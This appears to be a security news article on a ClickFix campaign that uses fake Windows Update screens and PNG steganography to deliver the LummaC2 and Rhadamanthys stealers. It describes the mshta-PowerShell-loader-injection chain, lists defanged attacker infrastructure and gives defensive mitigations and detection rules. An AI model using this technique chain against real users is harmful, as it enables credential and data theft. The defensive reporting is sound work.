Cybercriminals Exploit Fake Windows Update Screens to Deploy Steganography-Based Malware
In a concerning development, cybercriminals have refined their tactics to distribute malware by leveraging counterfeit Windows Update screens combined with steganography—a method of concealing code within image files. This sophisticated approach aims to deceive users into executing malicious commands, leading to the installation of information-stealing malware such as LummaC2 and Rhadamanthys.
Understanding the ClickFix Technique
The foundation of this attack lies in a social engineering method known as ClickFix. In this scheme, users are prompted to press the Windows key and R simultaneously, opening the Run dialog box. Unbeknownst to them, a malicious command has been automatically copied to their clipboard. When users paste and execute this command, they inadvertently initiate the malware installation process.
Initially, attackers employed generic Human Verification prompts to lure users. However, recent observations by cybersecurity firm Huntress reveal a shift towards more convincing full-screen Windows Update imitations. These fake update screens display realistic progress messages, enhancing their credibility and increasing the likelihood of user compliance.
The Role of Steganography in Malware Deployment
A distinctive aspect of this campaign is its use of steganography to embed malicious code within PNG image files. The attack sequence unfolds as follows:
1. Initiation via mshta.exe: The malicious command executed by the user launches mshta.exe, a legitimate Windows utility for executing HTML applications. This utility retrieves a URL with a hex-encoded IP address, initiating the next stage of the attack.
2. Execution of Obfuscated PowerShell Scripts: The process continues with the download and execution of obfuscated PowerShell scripts. These scripts are designed to evade detection by traditional security measures.
3. Deployment of the Steganographic Loader: A .NET-based loader is then executed, which decrypts an embedded PNG image resource. This loader extracts raw bitmap data from the image, reconstructing shellcode hidden within a specific color channel. A custom XOR-based routine is employed to recover the payload in memory.
4. Injection into System Processes: The recovered shellcode is Donut-packed—a technique for executing .NET assemblies in memory—and injected into a target process, such as explorer.exe. This is achieved through dynamically compiled C# code that utilizes standard Windows APIs like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
This intricate method allows the malware to operate stealthily, blending with legitimate Windows processes and making detection challenging.
Identified Malware Variants
Analyses have identified that this campaign primarily delivers two types of information-stealing malware:
– LummaC2: A sophisticated malware designed to exfiltrate sensitive information from infected systems.
– Rhadamanthys: Another information stealer known for its capability to harvest a wide range of data, including credentials and financial information.
These malware variants pose significant risks to both individual users and organizations by compromising personal and sensitive data.
Infrastructure and Campaign Persistence
Huntress has been monitoring clusters of these ClickFix Windows Update campaigns since early October. Notably, the IP address 141.98.80[.]175 has been repeatedly used, with varying paths such as /tick.odd, /gpsc.dat, and /one.dat for the initial mshta.exe stage. Subsequent PowerShell stages have been hosted on domains like securitysettings[.]live and xoiiasdpsdoasdpojas[.]com, indicating a well-coordinated and persistent attack infrastructure.
These campaigns have continued to surface around the time of Operation Endgame 3.0, which targeted Rhadamanthys’ infrastructure in mid-November, disrupting servers and seizing domains linked to the stealer. Despite these efforts, researchers observed multiple active domains still serving the Windows Update ClickFix lure, though the Rhadamanthys payload itself appeared to be unavailable.
Mitigation Strategies
Given the reliance of this attack on user interaction with the Run dialog, organizations can implement several measures to mitigate the risk:
– Disable the Windows Run Box: Administrators can disable the Windows Run box via Group Policy or registry settings. For example, configuring the NoRun policy under the Explorer key can prevent users from accessing the Run dialog, thereby reducing the risk of executing malicious commands.
– Monitor for Suspicious Process Activity: Security teams should utilize Endpoint Detection and Response (EDR) telemetry to monitor for instances where explorer.exe spawns mshta.exe, powershell.exe, or other scripting binaries with suspicious command lines.
– User Education and Awareness: Educating users is crucial. Employees should be informed that legitimate CAPTCHA checks or Windows Update processes will never require pasting commands into the Run prompt from a web page.
– Review RunMRU Registry Key: During security investigations, analysts can review the RunMRU registry key, which records recent commands executed via the Run dialog. This can help identify potential ClickFix abuse.
Conclusion
The evolution of cyber threats underscores the importance of vigilance and proactive security measures. By understanding the tactics employed in these sophisticated attacks and implementing robust mitigation strategies, both individuals and organizations can better protect themselves against such deceptive and harmful campaigns.
